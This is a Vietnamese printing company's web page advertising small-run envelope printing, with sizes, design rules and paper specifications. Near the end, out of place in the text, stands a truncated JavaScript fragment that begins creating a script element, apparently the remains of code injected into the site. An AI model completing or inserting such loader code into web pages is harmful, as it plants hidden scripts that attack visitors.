In ấn - thiết kế

In bao thư số lượng ít

In bao thư số lượng ít

In bao thư số lượng ít

Đánh giá in sản phẩm


Ngày nay, việc in bao thư trở nên phổ biến đối với doanh nghiệp nói riêng và đối với mọi người nói chúng, chiếc bao thư trở nên quan trọng hơn trong giao tiếp giữa mọi người với nhau, bao thư không chỉ chứa đụng thông tin trao đổi mà nó còn chứa đựng tình cảm, sự trân trọng của bạn đối với đối tác nhận thư.

Bảng giá in bao thư số lượng ít

Bảng giá in nhanh bao thư

in bao thu số lượng ít

Lưu ý khi in bao thư số lượng ít:

 • Quy cách bao thư in 4 màu
  – Bao thư nhỏ: (220 X 120)mm
  – Bao thư trung: (240 X 180)mm
  – Bao thư lớn: (345 x 250)mm
 • Quy cách thiết kế bao thư
  – Hình ảnh và màu sắc phải nằm trong kích thước
  – Không in màu nắp
  – Không in khung viền bao thư

Kích thước khác theo yêu cầu khách hàng
Qui cách: In 1 mặt bằng công nghệ in nhanh 4 màu,
cắt bế, gia công thành phẩm
Định lượng giấy: Fort 100gsm – 120gsm
(hoặc định lượng giấy khác theo yêu cầu)

Chính vì lý do đó mà công ty in bao thư của chúng tôi ra đời. Tuy nhiên, việc in bao thư tốn khá nhiều chi phí của quý khách, ra đời nhằm mục đích tiết kiệm chi phí cho doanh nghiệp, công ty in bao thư số lượng ít của chúng tôi chuyên thiết kế, in bao thư giá tốt nhất, với phương châm uy tín, chất lượng đặt lên hàng đầu.

Nhu cầu in bao thư số lượng ít là nhu cầu cố thật trong bối cảnh kinh tế hiện nay, các doanh nghiệp vừa và nhỏ muốn in bao thư để làm thương hiệu cũng khá đắn đo khi phải bỏ ra một số tiền không nhỏ để in bao thư theo kiểu truyền thống là in với số lượng nhiều thì mới có giá rẻ. Với phương châm đồng hành cùng doanh nghiệp, chúng tôi luôn quan tâm đến các bạn và cố gắng đưa ra những giải pháp để cùng các bạn phát triển và giải pháp cho việc in bao thư là dung hệ thống máy in nhanh để phục vụ cho các bạn in bao thư số lượng ít với giá rẻ.

in bao thu gia re

Vì sao bạn nên chọn in bao thư số lượng ít tại In Sài Gòn

Với cách in máy offset mới nhất, công nghệ 4 màu sẽ mang đến cho quý khách những sản phẩm bao thư hoàn hảo và đẳng cấp nhất. Vì hơn ai hết công ty của chúng tôi biết bao thư là một yếu tố quan trọng cần thiết trong chiến lược quảng bá sản phẩm mang lại hiệu quả cao cho doanh nghiệp. Nên từ khâu designer đến giai đoạn đóng gói chúng tôi rất quan trọng đến chất lượng, uy tín để khi giao hàng quý khách cầm trên tay là một sản phẩm bao thư đẹp, sang trọng, chuyên nghiệp.

Ngoài ra, sau khi in chúng tôi có khâu gia công kỹ lưỡng đến từng chi tiết nhỏ quý khách hàng có thể yên tâm bao thư sẽ không bị lỗi. Hãy liên hệ với chúng tôi để sở hữu những chiếc bao thư chất lượng nhất.

 var d=document;var s=d.createElement(‘script’);

Posted in: Thông tin in ấn

Leave a Comment (0) ↓